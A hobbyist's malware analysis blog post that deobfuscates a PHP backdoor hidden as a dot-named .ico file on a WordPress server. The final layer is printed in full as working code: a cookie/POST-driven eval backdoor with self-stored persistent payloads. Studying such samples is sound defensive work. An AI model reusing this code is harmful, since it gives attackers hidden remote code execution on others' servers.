Presented by Tim

Update - Part 2

I was asked earlier this week by a friend to have a look at some malware, which had been uncovered on a compromised computer. I didn’t ask where it had come from, or indeed about the host environment. Having programmed in PHP since university, and with malware analysis being something of a hobby, I thought I would give it a go.

Before going any further, I set up one of my Kali Linux VMs with PHP installed on it. The VM was isolated from the internet, and even from the host machine. I took a snapshot of the machine before introducing the malware, to make sure I could restore the VM to a known good state if things went wrong.

Layer 1 - The XOR

Starting to examine the malware, the first thing I noticed was that it was not without its defenses against analysis. The code reproduced below has had several parts removed to aid reading.

<?php $_20lsq = basename/*hce*/(/*a*/trim/*q13*/(/*w*/preg_replace/*zsgp*/(/*12x*/rawurldecode/*xnrbo*/(/*lq8*/"%2F%5C%28.%2A%24%2F"/*vky*/)/*b*/, '', __FILE__/*1q*/)/*8redn*//*ijdno*/)/*lq*//*m*/)/*z3*/;$_1j87lwe = "GQ%19%1FE%02V%02%08%40%0C%07G%09DME%01%07%5E%3B%02A%07%17%0AVCfT%16%03R%10%04%0ENJF%24L3S%01%00Z%0A% ... ";eval/*p1ah*/(/*d5nsu*/rawurldecode/*jrp*/(/*k2zm*/$_1j87lwe/*p*/)/*l48*/ ^ substr/*2g8v*/(/*dp6xa*/str_repeat/*7tld1*/(/*apu46*/$_20lsq, /*7bv4*/(/*34w*/strlen/*sgvwq*/(/*lgy*/$_1j87lwe/*a9*/)/*0ny*//strlen/*a47*/(/*i*/$_20lsq/*mw*/)/*hlzo6*//*6r1*/)/*tlpj*/ + 1/*a*/)/*h*/, 0, strlen/*9fgb*/(/*u*/$_1j87lwe/*pk*/)/*6ax*//*igy*/)/*bh*//*5*/)/*9w*/;

The comments in the PHP were quite annoying, and distracting from an analysis point of view. Fortunately, PHP has a built-in option for removing comments. After all, who comments code anyway? :-) Running “php -w” on the file stripped the comments from the code. Now to find out what is actually going on. The code itself is actually 3 statements, all mashed into one line: visually a pain, functionally OK. Separating the code out into 3 lines and removing the comments gives us

<?php $_20lsq = basename(trim(preg_replace(rawurldecode("%2F%5C%28.%2A%24%2F"), '', __FILE__)));
$_1j87lwe = "GQ%19%1FE%02V%02%08%40%0C%07G%09DME%01%07%5E%3B%02A%07%17%0AVCfT%16%03R%10%04%0ENJF%24L3S%01%00Z%0A% ... ";
eval(rawurldecode($_1j87lwe) ^ substr(str_repeat($_20lsq, (strlen($_1j87lwe)/strlen($_20lsq)) + 1), 0, strlen($_1j87lwe)));

Not that it looks vastly better, but it does help with the analysis. Looking at line 1, we can see that it is using its own path and filename for some purpose, one that involves a URL-encoded string, a replacement of characters and some trimming. Fortunately, the easiest way to find out what is happening is to just echo out the variable. Doing this revealed that the variable contained the exact name of the file. I had originally been given the file via Pastebin, so I asked for, and was given, the original file. The extension was .ico (icon). The file name also started with a dot (.), which is the way of making a hidden file on Linux / Unix.
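Going back to that first statement, the URL-encoded pattern can also be decoded on its own, without running the sample. The sketch below is mine rather than part of the malware: derive_key() is a hypothetical helper name and the paths are made up. When PHP runs code inside eval(), __FILE__ gains a suffix such as "(1) : eval()'d code", which is presumably what the pattern is there to strip.

```php
<?php
// Hypothetical helper: mirrors the first statement of the sample with readable names.
function derive_key(string $file_constant): string
{
    // rawurldecode("%2F%5C%28.%2A%24%2F") yields the pattern /\(.*$/
    $pattern = rawurldecode("%2F%5C%28.%2A%24%2F");
    // Drop everything from the first "(" to the end, then keep only the file name.
    return basename(trim(preg_replace($pattern, '', $file_constant)));
}

echo rawurldecode("%2F%5C%28.%2A%24%2F"), PHP_EOL;
// Made-up paths for illustration only.
echo derive_key("/var/www/html/.example.ico"), PHP_EOL;
echo derive_key("/var/www/html/.example.ico(1) : eval()'d code"), PHP_EOL;
```

Both calls should print the same bare file name, which matches what echoing the variable showed.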

The second string appeared to be encoded text, which left the third statement to look at. Renaming the 2 strings to var_a and var_b made the code clearer. The malware repeats the filename (var_a) until it is at least as long as the encoded string (var_b). The raw URL decoded var_b is then XOR’d with the string made from var_a; PHP’s string XOR stops at the end of the shorter operand, so any extra key bytes are ignored. Changing the eval to an echo, running the code and redirecting the output to a new file allowed the first layer to peel away.
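As a rough illustration of this layer, here is a minimal sketch of a repeating-key XOR round trip. The helper names repeat_key() and xor_layer() are my own, and the key and payload are made up; the sample does the same work in a single expression.

```php
<?php
// Hypothetical helper names; the key and payload below are made up.
function repeat_key(string $key, int $length): string
{
    // Repeat the key often enough to cover $length bytes, then trim the excess.
    return substr(str_repeat($key, intdiv($length, strlen($key)) + 1), 0, $length);
}

function xor_layer(string $encoded, string $key): string
{
    $data = rawurldecode($encoded);
    // PHP's ^ on two strings XORs byte by byte and stops at the shorter operand.
    return $data ^ repeat_key($key, strlen($encoded));
}

// Toy round trip: encode a harmless string the same way, then decode it.
$key     = ".example.ico";
$plain   = "echo 'hello from layer two';";
$encoded = rawurlencode($plain ^ repeat_key($key, strlen($plain)));

echo xor_layer($encoded, $key), PHP_EOL;
```

Note that xor_layer() echoes the decoded text rather than passing it to eval, which is the same swap used in the analysis.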

Layer 2 - Character Substitution

The next layer wasn’t quite as tricky. Below is a truncated output from the first layer. Again, comments have crept back in.

if (!defined('stream_context_create ')) { define('stream_context_create ', 1); $oigad = 3910; function inbqn($egepmaje, $ealwaknj){$oyjwthy = ''; for($i=0; $i < strlen($egepmaje); $i++){$oyjwthy .= isset($ealwaknj[$egepmaje[$i]]) ? $ealwaknj[$egepmaje[$i]] : $egepmaje[$i];} $zcudgqmmyb="rawurl" . "decode";return $zcudgqmmyb($oyjwthy);} $zogyxk = '%hW%hd%hW%hd%6hgBg_SXo%pM%pwXtt8t_i8k%pw%pc%phDTrr%'. 'p7%FP%hW%hd%6hgBg_SXo%pM%pwi8k_Xtt8tS%pw%pc%phh%p7%FP%hW%hd%6hgBg_SXo%pM%pwmLV'. '_XVXGzog8B_ogmX%pw%pc%phh%p7%FP%hW%hd%6hXtt8t_tXj8togBk%pMh%p7%FP%hW%hd%6hSXo_ogmX_'. 'igmgo%pMh%p7%FP%hW%hd%hW%hd%hW%hdgx%pM%pRYXxgBXY%pM%ppIuI_1Cr%pp%p7%p7%hW%hd%wP%hW%hd%ph'. ... 'VgG%pM%p7%FP%hW%hd%wW'; $nudubg = Array('1'=>'E', '0'=>'z', '3'=>'6', '2'=>'V', '5'=>'y', '4'=>'v', '7'=>'9', '6'=>'4', '9'=>'W', '8'=>'o', 'A'=>'q', 'C'=>'O', 'B'=>'n', 'E'=>'M', 'D'=>'N', 'G'=>'c', 'F'=>'3', 'I'=>'P', 'H'=>'Z', 'K'=>'G', 'J'=>'h', 'M'=>'8', 'L'=>'a', 'O'=>'5', 'N'=>'b', 'Q'=>'R', 'P'=>'B', 'S'=>'s', 'R'=>'1', 'U'=>'K', 'T'=>'U', 'W'=>'D', 'V'=>'x', 'Y'=>'d', 'X'=>'e', 'Z'=>'j', 'a'=>'J', 'c'=>'C', 'b'=>'X', 'e'=>'S', 'd'=>'A', 'g'=>'i', 'f'=>'w', 'i'=>'l', 'h'=>'0', 'k'=>'g', 'j'=>'p', 'm'=>'m', 'l'=>'Y', 'o'=>'t', 'n'=>'k', 'q'=>'I', 'p'=>'2', 's'=>'F', 'r'=>'L', 'u'=>'H', 't'=>'r', 'w'=>'7', 'v'=>'Q', 'y'=>'T', 'x'=>'f', 'z'=>'u'); eval/*fxkn*/(inbqn($zogyxk, $nudubg)); }

The first thing to notice is that the malware checks whether a constant has already been defined, presumably as a marker that it is already present. If it hasn’t been, the malware defines it and carries on.

The array that is assigned to $nudubg is interesting: it defines a character substitution. We can also see that the strings “rawurl” and “decode” are joined together to build a function name, and we have a very long obfuscated string. My theory was that the function substitutes each character of the long string using the array and then raw URL decodes the result. To prove this theory, I again replaced the eval with an echo and ran the code, redirecting the output to a new file. Lo and behold, the second layer peels away, and now we are on to the main functions of the malware.
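The substitution step can be sketched on its own with a few entries from the sample's map. The function name substitute_and_decode() is mine, and the map here is only the subset needed for the first few characters of the obfuscated string.

```php
<?php
// Readable version of the substitution routine; the names are my own.
function substitute_and_decode(string $input, array $map): string
{
    $out = '';
    for ($i = 0; $i < strlen($input); $i++) {
        $ch = $input[$i];
        // Characters without an entry in the map pass through unchanged.
        $out .= isset($map[$ch]) ? $map[$ch] : $ch;
    }
    return rawurldecode($out);
}

// Subset of the sample's map, enough to decode the start of the long string.
$map = array(
    'h' => '0', 'W' => 'D', 'd' => 'A', '6' => '4', 'g' => 'i', 'B' => 'n',
    'S' => 's', 'X' => 'e', 'o' => 't', 'p' => '2', 'M' => '8',
);

// The decoded text starts with two CRLF pairs, so trim before printing.
echo trim(substitute_and_decode('%hW%hd%hW%hd%6hgBg_SXo%pM', $map)), PHP_EOL;
```

The result lines up with the opening of the next layer, which begins with a call to @ini_set.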

Layer 3 - The Malware laid bare. Kind of.

The full function of the malware was now visible. Well, ish. The code had the same issue that disassembler output has in one regard: the variable and function names had been made completely meaningless. They still did their job, they just didn’t mean anything directly. Fortunately for us, parts of it can’t be hidden. The built-in function names are still there. This at least gives us a clue to the operation of the functions, and of course the variables that they act upon.

@ini_set('error_log', NULL); @ini_set('log_errors', 0); @ini_set('max_execution_time', 0); @error_reporting(0); @set_time_limit(0); if(!defined("PHP_EOL")) { define("PHP_EOL", "

"); } if(!defined("DIRECTORY_SEPARATOR")) { define("DIRECTORY_SEPARATOR", "/"); } if (!defined('file_put_contents ')) { define('file_put_contents ', 1); $hxgqukcsofcc = '9ac350bf-7b05-4f25-8195-ce44380aafa9'; global $hxgqukcsofcc; function ytkpmfs($uytczn) { if (strlen($uytczn) < 4) { return ""; } $gncokyyz = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; $lchuml = str_split($gncokyyz); $lchuml = array_flip($lchuml); $fxffhl = 0; $exvpmz = ""; $uytczn = preg_replace("~[^A-Za-z0-9\+\/\=]~", "", $uytczn); do { $xvucbwjn = $lchuml[$uytczn[$fxffhl++]]; $mepije = $lchuml[$uytczn[$fxffhl++]]; $sbhobs = $lchuml[$uytczn[$fxffhl++]]; $uovgupr = $lchuml[$uytczn[$fxffhl++]]; $uumyba = ($xvucbwjn << 2) | ($mepije >> 4); $qkplpbs = (($mepije & 15) << 4) | ($sbhobs >> 2); $altlvy = (($sbhobs & 3) << 6) | $uovgupr; $exvpmz = $exvpmz . chr($uumyba); if ($sbhobs != 64) { $exvpmz = $exvpmz . chr($qkplpbs); } if ($uovgupr != 64) { $exvpmz = $exvpmz . chr($altlvy); } } while ($fxffhl < strlen($uytczn)); return $exvpmz; } if (!function_exists('file_put_contents')) { function file_put_contents($gnlmabhg, $hxgqukc, $gohjysrt = False) { $pxwcutl = $gohjysrt == 8 ? 
'a' : 'w'; $hzrhdgnp = @fopen($gnlmabhg, $pxwcutl); if ($hzrhdgnp === False) { return 0; } else { if (is_array($hxgqukc)) $hxgqukc = implode($hxgqukc); $ajhhwvnq = fwrite($hzrhdgnp, $hxgqukc); fclose($hzrhdgnp); return $ajhhwvnq; } } } if (!function_exists('file_get_contents')) { function file_get_contents($mcyjre) { $skcxhwyt = fopen($mcyjre, "r"); $bnnulsb = fread($skcxhwyt, filesize($mcyjre)); fclose($skcxhwyt); return $bnnulsb; } } function dbkboso() { return trim(preg_replace("/\(.*\$/", '', __FILE__)); } function veyrrpc($vpfasf, $wyolccwj) { $rqlhqkbu = ""; for ($fxffhl=0; $fxffhl<strlen($vpfasf);) { for ($jlamhp=0; $jlamhp<strlen($wyolccwj) && $fxffhl<strlen($vpfasf); $jlamhp++, $fxffhl++) { $rqlhqkbu .= chr(ord($vpfasf[$fxffhl]) ^ ord($wyolccwj[$jlamhp])); } } return $rqlhqkbu; } function umzklia($vpfasf, $wyolccwj) { global $hxgqukcsofcc; return veyrrpc(veyrrpc($vpfasf, $wyolccwj), $hxgqukcsofcc); } function meyfzju($vpfasf, $wyolccwj) { global $hxgqukcsofcc; return veyrrpc(veyrrpc($vpfasf, $hxgqukcsofcc), $wyolccwj); } function ymjxpja() { $gnlmabhgcmqoues = @file_get_contents(dbkboso()); $ugpdjjik = strpos($gnlmabhgcmqoues, md5(dbkboso())); if ($ugpdjjik !== FALSE) { $wovbwub = substr($gnlmabhgcmqoues, $ugpdjjik + 32); $hzrhdgnprrmsrj = @unserialize(umzklia(rawurldecode($wovbwub), md5(dbkboso()))); } else { $hzrhdgnprrmsrj = Array(); } return $hzrhdgnprrmsrj; } function ifqhsss($hzrhdgnprrmsrj) { $qhuznb = rawurlencode(meyfzju(@serialize($hzrhdgnprrmsrj), md5(dbkboso()))); $gnlmabhgcmqoues = @file_get_contents(dbkboso()); $ugpdjjik = strpos($gnlmabhgcmqoues, md5(dbkboso())); if ($ugpdjjik !== FALSE) { $yblkqeg = substr($gnlmabhgcmqoues, $ugpdjjik + 32); $gnlmabhgcmqoues = str_replace($yblkqeg, $qhuznb, $gnlmabhgcmqoues); } else { $gnlmabhgcmqoues = $gnlmabhgcmqoues . "



//" . md5(dbkboso()) . $qhuznb; } @file_put_contents(dbkboso(), $gnlmabhgcmqoues); } function bushzx($rpznkysa, $zmhagl) { $hzrhdgnprrmsrj = ymjxpja(); $hzrhdgnprrmsrj[$rpznkysa] = ytkpmfs($zmhagl); ifqhsss($hzrhdgnprrmsrj); } function uzzylcyq($rpznkysa) { $hzrhdgnprrmsrj = ymjxpja(); unset($hzrhdgnprrmsrj[$rpznkysa]); ifqhsss($hzrhdgnprrmsrj); } function wzuxic($rpznkysa=NULL) { foreach (ymjxpja() as $khaklrbh=>$unqrza) { if ($rpznkysa) { if (strcmp($rpznkysa, $khaklrbh) == 0) { eval($unqrza); break; } } else { eval($unqrza); } } } foreach (array_merge($_COOKIE, $_POST) as $cedxbvcy => $vpfasf) { $vpfasf = @unserialize(umzklia(ytkpmfs($vpfasf), $cedxbvcy)); if (isset($vpfasf['ak']) && $hxgqukcsofcc==$vpfasf['ak']) { if ($vpfasf['a'] == 'i') { $fxffhl = Array( 'pv' => @phpversion(), 'sv' => '2.0-1', 'ak' => $vpfasf['ak'], ); echo @serialize($fxffhl); exit; } elseif ($vpfasf['a'] == 'e') { eval($vpfasf['d']); } elseif ($vpfasf['a'] == 'plugin') { if($vpfasf['sa'] == 'add') { bushzx($vpfasf['p'], $vpfasf['d']); } elseif($vpfasf['sa'] == 'rem') { uzzylcyq($vpfasf['p']); } } echo $vpfasf['ak']; exit(); } } wzuxic(); }

Above is the full code, as decoded from the layers of obfuscation. In order to figure out what this malware did, I started with 2 functions that the malware defined:

function dbkboso() { return trim(preg_replace("/\(.*\$/", '', __FILE__)); } function veyrrpc($vpfasf, $wyolccwj) { $rqlhqkbu = ""; for ($fxffhl=0; $fxffhl<strlen($vpfasf);) { for ($jlamhp=0; $jlamhp<strlen($wyolccwj) && $fxffhl<strlen($vpfasf); $jlamhp++, $fxffhl++) { $rqlhqkbu .= chr(ord($vpfasf[$fxffhl]) ^ ord($wyolccwj[$jlamhp])); } } return $rqlhqkbu; }

These functions were relatively small. The game here is to figure out what they do, and give the functions, along with their arguments, reasonable names. The first function, being only a one-liner, is quite straightforward. It just returns the filename of the malware (the path in __FILE__, with anything from the first opening bracket onwards removed). I decided to call the function get_filename, and proceeded to change all instances of dbkboso to get_filename.

The second function looked a bit more complicated. The first thing I did was replace $vpfasf and $wyolccwj with $arg_1 and $arg_2 respectively. Changing $rqlhqkbu to $return_string also helped. This made our new function look like this:

function veyrrpc($arg_1, $arg_2) { $return_string = ""; for ($fxffhl=0; $fxffhl<strlen($arg_1);) { for ($jlamhp=0; $jlamhp<strlen($arg_2) && $fxffhl<strlen($arg_1); $jlamhp++, $fxffhl++) { $return_string .= chr(ord($arg_1[$fxffhl]) ^ ord($arg_2[$jlamhp])); } } return $return_string; }

Clearer, but not 100%. The last 2 changes I made were $fxffhl for $i and $jlamhp for $j, since they seemed to be looping variables. This gives us the following:

function veyrrpc($arg_1, $arg_2) { $return_string = ""; for ($i=0; $i<strlen($arg_1);) { for ($j=0; $j<strlen($arg_2) && $i<strlen($arg_1); $j++, $i++) { $return_string .= chr(ord($arg_1[$i]) ^ ord($arg_2[$j])); } } return $return_string; }

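From the newly renamed function, we can deduce that it produces the XOR of arg_1 and arg_2, repeating arg_2 as often as needed. I renamed the function veyrrpc to XOR throughout the code. (This is for reading only: xor is a reserved word in PHP, so the renamed code would not run as is.) In doing so, the next 2 parts which became interesting were: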

function umzklia($vpfasf, $wyolccwj) { global $hxgqukcsofcc; return veyrrpc(veyrrpc($vpfasf, $wyolccwj), $hxgqukcsofcc); } function meyfzju($vpfasf, $wyolccwj) { global $hxgqukcsofcc; return veyrrpc(veyrrpc($vpfasf, $hxgqukcsofcc), $wyolccwj); }

To add a bit of context, the global variable $hxgqukcsofcc is defined elsewhere in the code and holds a fixed string. As I hadn’t found out too much about this variable, I had labelled it “stringa”. Putting in what we know about the XOR function, and substituting some simple names for the variable names, gave:

function umzklia($arg_1, $arg_2) { global $stringa; return XOR(XOR($arg_1, $arg_2), $stringa); } function meyfzju($arg_1, $arg_2) { global $stringa; return XOR(XOR($arg_1, $stringa), $arg_2); }

I gave the functions the names xortype1 and xortype2 and substituted them throughout the rest of the code. The 2 functions apply the same two keys in opposite orders. Because XOR gives the same result whichever key is applied first, at this point I didn’t know which was meant for encoding and which for decoding, and they would both work as either.
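A quick way to convince yourself of this is to run both orderings over the same input. The sketch below uses a readable copy of the XOR routine under the name xor_with_key(), and passes the fixed string as a third argument instead of a global. Both choices are mine, and all of the values are made up.

```php
<?php
// Readable copy of the sample's XOR routine. The name is mine, since "xor" is reserved in PHP.
function xor_with_key(string $data, string $key): string
{
    $out = '';
    for ($i = 0; $i < strlen($data);) {
        // The inner loop walks the key and restarts it whenever it runs out.
        for ($j = 0; $j < strlen($key) && $i < strlen($data); $j++, $i++) {
            $out .= chr(ord($data[$i]) ^ ord($key[$j]));
        }
    }
    return $out;
}

function xortype1(string $data, string $key, string $fixed): string
{
    return xor_with_key(xor_with_key($data, $key), $fixed);
}

function xortype2(string $data, string $key, string $fixed): string
{
    return xor_with_key(xor_with_key($data, $fixed), $key);
}

// Made-up values for illustration; the sample uses a global instead of a third argument.
$fixed = "not-the-real-fixed-string";
$key   = "some-key";
$data  = "a:1:{s:1:\"a\";s:1:\"i\";}";

$once = xortype1($data, $key, $fixed);
var_dump($once === xortype2($data, $key, $fixed)); // same bytes in either order
var_dump(xortype2($once, $key, $fixed) === $data); // applying it again undoes it
```

Each byte ends up XOR’d with one byte from each key regardless of order, which is why either function can encode or decode.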

The next pair of functions under examination were:

function ymjxpja() { $gnlmabhgcmqoues = @file_get_contents(dbkboso()); $ugpdjjik = strpos($gnlmabhgcmqoues, md5(dbkboso())); if ($ugpdjjik !== FALSE) { $wovbwub = substr($gnlmabhgcmqoues, $ugpdjjik + 32); $hzrhdgnprrmsrj = @unserialize(umzklia(rawurldecode($wovbwub), md5(dbkboso()))); } else { $hzrhdgnprrmsrj = Array(); } return $hzrhdgnprrmsrj; } function ifqhsss($hzrhdgnprrmsrj) { $qhuznb = rawurlencode(meyfzju(@serialize($hzrhdgnprrmsrj), md5(dbkboso()))); $gnlmabhgcmqoues = @file_get_contents(dbkboso()); $ugpdjjik = strpos($gnlmabhgcmqoues, md5(dbkboso())); if ($ugpdjjik !== FALSE) { $yblkqeg = substr($gnlmabhgcmqoues, $ugpdjjik + 32); $gnlmabhgcmqoues = str_replace($yblkqeg, $qhuznb, $gnlmabhgcmqoues); } else { $gnlmabhgcmqoues = $gnlmabhgcmqoues . "



//" . md5(dbkboso()) . $qhuznb; } @file_put_contents(dbkboso(), $gnlmabhgcmqoues); }

The main reason for examining them together is that they appeared to do similar jobs. Once they were decoded, it turned out that assumption was correct. As we have decoded some parts already, we can see that the first couple of lines of the first function store the contents of the malware file in a variable. It then checks whether it can find the MD5 of the filename within the file, and saves the offset. If the offset is found, the rest of the file is read into a new variable. The read starts 32 characters after the offset, due to the length of the MD5 hex string. The contents are then raw URL decoded, decoded using the xortype1 function with the MD5 as the second argument, and unserialized. If the offset is not found, an empty array is initialized.
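The marker-and-offset logic is easier to follow on a plain string than on a file. This is a simplified sketch of the storage format only: the XOR step is left out, the data lives in a string rather than on disk, and the names read_store() and append_store() and the path are all made up.

```php
<?php
// Sketch of the storage format only: no XOR step, no file access, names are mine.
function append_store(string $file_contents, string $marker, array $store): string
{
    // The data is appended as a trailing comment: marker first, payload after it.
    return $file_contents . "\n//" . $marker . rawurlencode(serialize($store));
}

function read_store(string $file_contents, string $marker): array
{
    $offset = strpos($file_contents, $marker);
    if ($offset === false) {
        return array(); // no marker means nothing has been stored yet
    }
    // An MD5 hex digest is 32 characters, so the payload starts right after it.
    $payload = substr($file_contents, $offset + 32);
    $decoded = unserialize(rawurldecode($payload));
    return is_array($decoded) ? $decoded : array();
}

$marker   = md5("/made/up/path/.example.ico");
$contents = append_store("<?php /* obfuscated body */", $marker, array('name' => 'value'));

print_r(read_store($contents, $marker));
print_r(read_store("<?php /* no marker here */", $marker));
```

The first call should return the stored array and the second an empty one, mirroring the two branches described above.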

The second function does a similar job, in that it encodes serialized data, and then stores it at the correct offset. The majority of the functions are now exposed to us, and we can see the basic behaviour of the malware. At this point, there are 3 main functions left to analyse. These are:

function bushzx($rpznkysa, $zmhagl) { $hzrhdgnprrmsrj = ymjxpja(); $hzrhdgnprrmsrj[$rpznkysa] = ytkpmfs($zmhagl); ifqhsss($hzrhdgnprrmsrj); } function uzzylcyq($rpznkysa) { $hzrhdgnprrmsrj = ymjxpja(); unset($hzrhdgnprrmsrj[$rpznkysa]); ifqhsss($hzrhdgnprrmsrj); } function wzuxic($rpznkysa=NULL) { foreach (ymjxpja() as $khaklrbh=>$unqrza) { if ($rpznkysa) { if (strcmp($rpznkysa, $khaklrbh) == 0) { eval($unqrza); break; } } else { eval($unqrza); } } }

The first 2 functions appear to be a pair again, as they both start by calling the function which gets the data out of the file, and both end by calling the function which encodes and stores data in the file. The second function removes an entry (using PHP’s built-in unset), while the first adds one using a function that I had skipped over. Looking back at that function, I made the assumption that it was an encoding or decoding function, and the character string within it looked very familiar to me: it is the same alphabet used in base64 encoding. While I did decode this function (ytkpmfs) and found it to be base64 decoding, I haven’t included the decoding here, and have left it as an exercise for the reader.
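For readers who would rather check their answer, one way to test the base64 theory is to rename the variables and compare the result against PHP's own base64_decode(). The sketch below is my reading of ytkpmfs, not the author's working: the name b64de matches the one used later in this post, while the variable names are guesses at intent.

```php
<?php
// Readable rewrite of the sample's decoder; variable names are guesses at intent.
function b64de(string $input): string
{
    if (strlen($input) < 4) {
        return "";
    }
    $alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
    $index = array_flip(str_split($alphabet)); // character => 6-bit value, "=" => 64
    $input = preg_replace("~[^A-Za-z0-9+/=]~", "", $input);
    $pos = 0;
    $out = "";
    do {
        $c1 = $index[$input[$pos++]];
        $c2 = $index[$input[$pos++]];
        $c3 = $index[$input[$pos++]];
        $c4 = $index[$input[$pos++]];
        // Four 6-bit values are repacked into up to three bytes.
        $out .= chr(($c1 << 2) | ($c2 >> 4));
        if ($c3 != 64) {
            $out .= chr((($c2 & 15) << 4) | ($c3 >> 2));
        }
        if ($c4 != 64) {
            $out .= chr((($c3 & 3) << 6) | $c4);
        }
    } while ($pos < strlen($input));
    return $out;
}

// Harmless test string; compare against the built-in decoder.
$sample = base64_encode("eval is not your friend");
var_dump(b64de($sample) === base64_decode($sample));
```

The value 64 is the position of "=" in the alphabet string, so the two checks against 64 are how the routine skips padding.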

The last function (which is called at the end of the program) appears to eval each value stored in that array, or only the one matching a given name. This is likely to be the mechanism for how the stored commands are executed.

The last part of the code which I haven’t decoded so far looks quite distinctive.

foreach (array_merge($_COOKIE, $_POST) as $cedxbvcy => $vpfasf) { $vpfasf = @unserialize(umzklia(ytkpmfs($vpfasf), $cedxbvcy)); if (isset($vpfasf['ak']) && $hxgqukcsofcc==$vpfasf['ak']) { if ($vpfasf['a'] == 'i') { $fxffhl = Array( 'pv' => @phpversion(), 'sv' => '2.0-1', 'ak' => $vpfasf['ak'], ); echo @serialize($fxffhl); exit; } elseif ($vpfasf['a'] == 'e') { eval($vpfasf['d']); } elseif ($vpfasf['a'] == 'plugin') { if($vpfasf['sa'] == 'add') { bushzx($vpfasf['p'], $vpfasf['d']); } elseif($vpfasf['sa'] == 'rem') { uzzylcyq($vpfasf['p']); } } echo $vpfasf['ak']; exit(); } }

The main part that looked distinctive was the array:

$fxffhl = Array( 'pv' => @phpversion(), 'sv' => '2.0-1', 'ak' => $vpfasf['ak'], );

The main reason this looked distinctive was that it isn’t obfuscated at all. The variable name is, but the rest of it is unlikely to be. The array keys can’t be, as that would change the behaviour of the program. A bit of googling found a Stack Overflow link.

Decoding the last part of the malware using variable name substitution gave me:

foreach (array_merge($_COOKIE, $_POST) as $parameters => $param) { $param = @unserialize(xortype1(b64de($param), $parameters)); if (isset($param['ak']) && $stringa==$param['ak']) { if ($param['a'] == 'i') { $fxffhl = Array( 'pv' => @phpversion(), 'sv' => '2.0-1', 'ak' => $param['ak'], ); echo @serialize($fxffhl); exit; } elseif ($param['a'] == 'e') { eval($param['d']); } elseif ($param['a'] == 'plugin') { if($param['sa'] == 'add') { bushzx($param['p'], $param['d']); } elseif($param['sa'] == 'rem') { uzzylcyq($param['p']); } } echo $param['ak']; exit(); } }

Conclusion

The malware appears to be a backdoor, and it was spread liberally around the WordPress server. As mentioned in the Stack Overflow link, YARA rules can detect the obfuscated malware.

Malware analysis in PHP is straightforward, but does require patience. Evals can be swapped out for echos and, although I didn’t use it for this, PHP has a debugger (Xdebug). In future, I may make a post about this debugger.